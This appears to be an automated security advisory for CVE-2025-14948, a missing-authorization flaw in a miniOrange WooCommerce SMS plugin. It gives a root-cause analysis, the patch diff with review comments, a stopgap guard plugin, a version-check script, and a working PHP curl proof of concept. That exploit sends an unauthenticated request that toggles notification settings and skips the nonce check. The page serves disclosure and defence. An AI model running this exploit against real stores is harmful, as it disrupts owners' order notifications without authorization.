Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-14948: miniOrange OTP Verification and SMS Notification for WooCommerce <= 4.3.8 – Missing Authorization to Unauthenticated Notification Settings Modification (miniorange-sms-order-notification-otp-verification)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 4.3.8
Patched Version: 4.3.9
Disclosed: January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14948:
This vulnerability is a missing authorization flaw in the miniOrange OTP Verification and SMS Notification for WooCommerce WordPress plugin. It allows unauthenticated attackers to modify the plugin’s SMS notification settings for WooCommerce orders. The CVSS score of 5.3 indicates a medium severity impact.

The root cause is the AJAX handler `enable_wc_sms_notification()` having no capability check and only a conditional nonce check. In the vulnerable version, `notifications/wcsmsnotification/handler/class-woocommercenotifications.php` registered the AJAX action `mo_wc_notification_enable` (stored in `$this->enable_notification_action`) for both authenticated (`wp_ajax_`) and unauthenticated (`wp_ajax_nopriv_`) callers in its constructor (old line 67 in the diff below). The handler itself (old line 138) never verified that the caller held an administrative capability such as `manage_options`, and its only check, `array_key_exists( 'option', $_POST ) && ! check_ajax_referer( ... )`, ran the nonce verification only when an unrelated `option` POST parameter was present; a request that omitted `option` skipped it entirely.

Exploitation is a single unauthenticated POST to the WordPress `admin-ajax.php` endpoint with the `action` parameter set to `mo_wc_notification_enable` and a `notification` parameter naming the notification type to enable or disable. No cookies, nonce or `option` parameter are sent. The request succeeds because the `wp_ajax_nopriv_` hook routes it to the handler, the handler performs no authorization check, and without `option` the nonce check never runs.

The patch in version 4.3.9 makes two key changes. First, the constructor no longer registers the `wp_ajax_nopriv_` hook (the removed line at old line 67), so the endpoint is only reachable by logged-in users. Second, `enable_wc_sms_notification()` now opens with a `current_user_can( 'manage_options' )` check (new lines 145-154) that returns the plugin's error JSON to anyone who is not an administrator, followed by an unconditional `check_ajax_referer( $this->nonce, $this->nonce_key, false )` (new line 157); the third argument makes the function return `false` on a bad nonce instead of dying, so the plugin can send its own JSON error. To support this, the constructor now sets `$this->nonce = 'mo_admin_actions'` and `$this->nonce_key = 'security'`, and the localized script gains `nonce` and `nonceKey` entries (new lines 132-133) so the admin UI can supply the token.
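For a site that cannot update immediately, the following must-use plugin is an added example (not vendor code and not part of this advisory) that reproduces the effect of the patch from outside the plugin: it hooks `admin_init`, which `admin-ajax.php` fires before dispatching `wp_ajax_` / `wp_ajax_nopriv_` actions, and rejects calls to `mo_wc_notification_enable` from anyone who is not logged in with `manage_options`. The action name is taken from the diff; the file, function and plugin names are my own choices.

```php
<?php
/**
 * Plugin Name: Temporary guard for CVE-2025-14948
 * Description: Blocks unauthenticated and non-admin calls to the
 *              mo_wc_notification_enable AJAX action until the miniOrange
 *              plugin is updated to 4.3.9 or later.
 *
 * Added example, not vendor code. Save as wp-content/mu-plugins/mo-cve-2025-14948-guard.php
 * and delete it once the plugin is updated.
 */

// Priority 0 so this runs before anything else hooked to admin_init.
add_action( 'admin_init', 'mo_cve_2025_14948_guard', 0 );

/**
 * admin-ajax.php fires admin_init before it dispatches wp_ajax_{action} /
 * wp_ajax_nopriv_{action}, so this runs ahead of the plugin's handler.
 */
function mo_cve_2025_14948_guard() {
	// Only AJAX requests can reach the vulnerable handler.
	if ( ! wp_doing_ajax() ) {
		return;
	}

	// admin-ajax.php reads the action from $_REQUEST, so accept GET or POST here too.
	$action = isset( $_REQUEST['action'] ) ? (string) wp_unslash( $_REQUEST['action'] ) : '';
	if ( 'mo_wc_notification_enable' !== $action ) {
		return;
	}

	// Mirror 4.3.9: anonymous callers get WordPress's own "no such action" reply
	// ("0", HTTP 400), and logged-in callers must hold manage_options.
	if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
		wp_die( '0', 400 );
	}
}
```

This guard covers the missing authorization only. It cannot add the nonce check that 4.3.9 introduces, because the vulnerable handler only verifies a nonce when an `option` parameter is sent, so it is a stopgap rather than a substitute for the update. Unauthenticated callers see the same `0` / HTTP 400 body that a patched site returns when no `wp_ajax_nopriv_` hook exists for the action.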

Successful exploitation allows an unauthenticated attacker to toggle the plugin’s SMS notification settings on or off. This could disrupt store operations by disabling order confirmations or administrative alerts sent via SMS. While the vulnerability does not directly lead to data exposure or code execution, it enables unauthorized modification of a critical business function, impacting the integrity of the WooCommerce store’s notification system.
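To decide whether a given site is exposed without toggling anything, a practitioner would first read the plugin version passively and only then interpret the result of the active request described above. The script below is an added example (not Atomic Edge or vendor code). It assumes the plugin ships a standard WordPress `readme.txt` with a `Stable tag:` header, typically readable at `/wp-content/plugins/miniorange-sms-order-notification-otp-verification/readme.txt` (the slug is from the advisory; whether `readme.txt` is exposed varies by host), and it takes the fixed version `4.3.9` from the advisory. The sample readme text is constructed for the demo.

```php
<?php
/**
 * Added example (not vendor or Atomic Edge code): passive version check for
 * CVE-2025-14948 from a plugin readme.txt, plus a classifier for the
 * admin-ajax.php response an unauthenticated probe receives.
 *
 * Assumptions: standard WordPress readme.txt with a "Stable tag:" line;
 * fixed version 4.3.9 per the advisory; WordPress replies "0" (HTTP 400)
 * when no wp_ajax_nopriv_ hook exists for the requested action.
 */

const MO_FIXED_VERSION = '4.3.9';

/** Extract the "Stable tag" value from readme.txt contents, or null if absent/non-numeric. */
function mo_stable_tag_from_readme( string $readme ): ?string {
	if ( preg_match( '/^\s*Stable tag:\s*([0-9][0-9.]*)\s*$/mi', $readme, $m ) ) {
		return $m[1];
	}
	return null;
}

/** True when the installed version predates the fix (4.3.8 and older). */
function mo_is_vulnerable_version( string $version ): bool {
	// version_compare handles multi-digit components, e.g. 4.3.10 > 4.3.9.
	return version_compare( $version, MO_FIXED_VERSION, '<' );
}

/**
 * Interpret the body returned to an UNAUTHENTICATED POST to admin-ajax.php with
 * action=mo_wc_notification_enable. A body of "0" means WordPress found no
 * wp_ajax_nopriv_ hook for the action, which is what 4.3.9 achieves by removing
 * it. A JSON body means the plugin's handler ran, i.e. the site is vulnerable
 * and the probe itself may already have toggled a notification setting.
 */
function mo_classify_ajax_response( int $status, string $body ): string {
	$body = trim( $body );
	if ( '0' === $body ) {
		return 'no nopriv handler (patched, or plugin inactive)';
	}
	// Checked after the "0" case because json_decode('0') is a valid int 0.
	if ( null !== json_decode( $body, true ) ) {
		return 'handler executed unauthenticated (vulnerable)';
	}
	return 'unexpected response (HTTP ' . $status . '), inspect manually';
}

// Constructed sample readme in the shape WordPress.org expects; not taken from the plugin.
$sample_readme = "=== miniOrange OTP Verification and SMS Notification for WooCommerce ===\n"
	. "Requires at least: 4.0\n"
	. "Stable tag: 4.3.8\n";

if ( PHP_SAPI === 'cli' ) {
	$tag = mo_stable_tag_from_readme( $sample_readme );
	$verdict = ( null !== $tag && mo_is_vulnerable_version( $tag ) )
		? 'VULNERABLE (< ' . MO_FIXED_VERSION . ')'
		: 'not affected or unknown';
	printf( "Stable tag: %s -> %s\n", $tag ?? 'unknown', $verdict );
	printf( "Probe body \"0\"  -> %s\n", mo_classify_ajax_response( 400, '0' ) );
	printf( "Probe body JSON -> %s\n", mo_classify_ajax_response( 200, '{"message":"x"}' ) );
}
```

Use the readme check first: the active request is not a read-only test on a vulnerable site, since a JSON reply means the handler has already processed the `notification` value you sent.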

Differential between vulnerable and patched code

Code Diff
--- a/miniorange-sms-order-notification-otp-verification/autoload.php
+++ b/miniorange-sms-order-notification-otp-verification/autoload.php
@@ -181,7 +181,7 @@
 			$package = wp_json_encode(
 				array(
 					'name'         => 'miniorange-otp-verification',
-					'version'      => '4.3.8',
+					'version'      => '4.3.9',
 					'type'         => 'MiniOrangeGateway',
 					'testmode'     => false,
 					'failmode'     => false,
--- a/miniorange-sms-order-notification-otp-verification/miniorange_validation_settings.php
+++ b/miniorange-sms-order-notification-otp-verification/miniorange_validation_settings.php
@@ -3,7 +3,7 @@
  * Plugin Name: miniOrange OTP Verification and SMS Notification for WooCommerce
  * Plugin URI: http://miniorange.com/miniorange-woocommerce-otp-plugin
  * Description: WooCommerce SMS Notification. WCFM & Dokan Notifications. SMS & Email OTP Verification for all WooCommerce forms. PasswordLess Login. 24/7 support.
- * Version: 4.3.8
+ * Version: 4.3.9
  * Author: miniOrange
  * Author URI: http://miniorange.com
  * Text Domain: miniorange-order-notifications-woocommerce
--- a/miniorange-sms-order-notification-otp-verification/notifications/wcsmsnotification/handler/class-woocommercenotifications.php
+++ b/miniorange-sms-order-notification-otp-verification/notifications/wcsmsnotification/handler/class-woocommercenotifications.php
@@ -56,6 +56,10 @@
 	protected function __construct() {
 		parent::__construct();

+		// Initialize nonce for security checks.
+		$this->nonce     = 'mo_admin_actions';
+		$this->nonce_key = 'security';
+
 		add_action( 'admin_enqueue_scripts', array( $this, 'mo_wc_sms_notif_settings_style' ) );
 		add_action( 'admin_enqueue_scripts', array( $this, 'mo_wc_sms_notif_settings_script' ) );

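Review bot: `$this->nonce` and `$this->nonce_key` are assigned here, but the hunk does not show them declared on this class or its parent; undeclared properties become dynamic properties, deprecated since PHP 8.2, so confirm a `protected $nonce;` / `protected $nonce_key;` declaration exists. Also, `'mo_admin_actions'` reads as a shared nonce action: a nonce minted for it is accepted by every handler that verifies the same string, so a per-endpoint action name (for example the value of `$this->enable_notification_action`) would make the CSRF token specific to this handler.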
@@ -64,7 +68,7 @@

 		$this->enable_notification_action = 'mo_wc_notification_enable';

-		add_action( 'wp_ajax_nopriv_' . $this->enable_notification_action, array( $this, 'enable_wc_sms_notification' ) );
+		// Only allow authenticated users with proper permissions to access this AJAX endpoint.
 		add_action( 'wp_ajax_' . $this->enable_notification_action, array( $this, 'enable_wc_sms_notification' ) );

 		add_action( 'woocommerce_created_customer_notification', array( $this, 'mo_send_new_customer_sms_notif' ), 1, 3 );
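Review bot: removing the `wp_ajax_nopriv_` registration is the right fix, but the comment placed above the surviving line overstates it: `wp_ajax_` alone makes the endpoint reachable by any logged-in user, subscribers included, so the "proper permissions" half is only true because of the `current_user_can( 'manage_options' )` check added in the handler. Suggest "Authenticated users only; capability is checked in enable_wc_sms_notification()" so the two parts of the fix are not conflated.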
@@ -118,16 +122,18 @@
 	 * @return void
 	 */
 	public function mo_wc_sms_notif_settings_script() {
-				wp_register_script( 'settingswcnotif', MOWC_MSN_JS_URL, array( 'jquery' ), WC_MSN_VERSION, false );
-				wp_localize_script(
-					'settingswcnotif',
-					'mowcsmsvar',
-					array(
-						'siteURL' => wp_wc_ajax_url(),
-						'action'  => $this->enable_notification_action,
-					)
-				);
-				wp_enqueue_script( 'settingswcnotif' );
+		wp_register_script( 'settingswcnotif', MOWC_MSN_JS_URL, array( 'jquery' ), WC_MSN_VERSION, false );
+		wp_localize_script(
+			'settingswcnotif',
+			'mowcsmsvar',
+			array(
+				'siteURL'  => wp_wc_ajax_url(),
+				'action'   => $this->enable_notification_action,
+				'nonce'    => wp_create_nonce( $this->nonce ),
+				'nonceKey' => $this->nonce_key,
+			)
+		);
+		wp_enqueue_script( 'settingswcnotif' );
 	}

 	/**
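Review bot: the only functional change in this hunk is the two new localized values `'nonce'` and `'nonceKey'`; everything else is re-indentation of lines that previously carried an extra tab level, which hides the security change in whitespace churn and should be a separate commit. The JavaScript side is not in this diff, so verify that `settingswcnotif` now posts the nonce under the key named by `nonceKey` (`security`); otherwise administrators will hit the new `check_ajax_referer` failure in the handler.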
@@ -136,7 +142,19 @@
 	 * @return void
 	 */
 	public function enable_wc_sms_notification() {
-		if ( array_key_exists( 'option', $_POST ) && ! check_ajax_referer( $this->nonce, $this->nonce_key ) ) {
+		// Check if user has proper authorization (admin only).
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json(
+				MoUtility::create_json(
+					MoMessages::showMessage( BaseMessages::INVALID_OP ),
+					MoConstants::ERROR_JSON_TYPE
+				)
+			);
+			exit;
+		}
+
+		// Verify nonce to prevent CSRF attacks.
+		if ( ! check_ajax_referer( $this->nonce, $this->nonce_key, false ) ) {
 			wp_send_json(
 				MoUtility::create_json(
 					MoMessages::showMessage( BaseMessages::INVALID_OP ),
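Review bot: the removed condition `array_key_exists( 'option', $_POST ) && ! check_ajax_referer( ... )` only verified the nonce when an unrelated `option` parameter was present, so a request without `option` skipped it entirely; the new unconditional call with `false` as the third argument closes that and lets the plugin return its own JSON error instead of `check_ajax_referer`'s default die, and running the capability check before the nonce check is the right order. One nit: `wp_send_json()` terminates the request itself, so the `exit;` after each call is unreachable and can be dropped.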
@@ -145,6 +163,7 @@
 			);
 			exit;
 		}
+
 		if ( isset( $_POST['notification'] ) ) {
 			$wc_notification_type = sanitize_text_field( wp_unslash( $_POST['notification'] ) );
 		}
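Review bot: `$wc_notification_type` is only assigned when `$_POST['notification']` is set, and `sanitize_text_field` does not constrain it to a known notification name. The code following this hunk is not in the diff, so confirm it returns early when the variable is unset and validates the value against the plugin's list of notification types before acting on it.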

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14948 - miniOrange OTP Verification and SMS Notification for WooCommerce <= 4.3.8 - Missing Authorization to Unauthenticated Notification Settings Modification

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// The vulnerable AJAX action (registered with wp_ajax_nopriv_ in <= 4.3.8).
$ajax_action = 'mo_wc_notification_enable';

// The POST data to toggle a notification setting.
// The 'notification' value must match a notification type known to the plugin;
// the value below is a placeholder, not a name taken from the plugin source.
// Deliberately no 'option' parameter: in the vulnerable handler the nonce check
// only runs when 'option' is present in the POST body, so omitting it skips the check.
$post_data = array(
    'action'       => $ajax_action,
    'notification' => 'wc_order_status_completed', // Example notification type (placeholder)
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Lab use only: disables TLS verification.
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request as an unauthenticated user (no cookies, no nonce).
$response = curl_exec($ch);
if ($response === false) {
    fwrite(STDERR, 'cURL error: ' . curl_error($ch) . "\n");
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response.
echo "HTTP Status: $http_code\n";
echo "Response: $response\n";
// A body of "0" (normally with HTTP 400) means WordPress found no wp_ajax_nopriv_
// hook for the action, which is what 4.3.9 does by removing that hook.
// A JSON body means the handler ran; the exact success/failure message depends on
// the plugin's internal logic and the provided 'notification' value.

?>
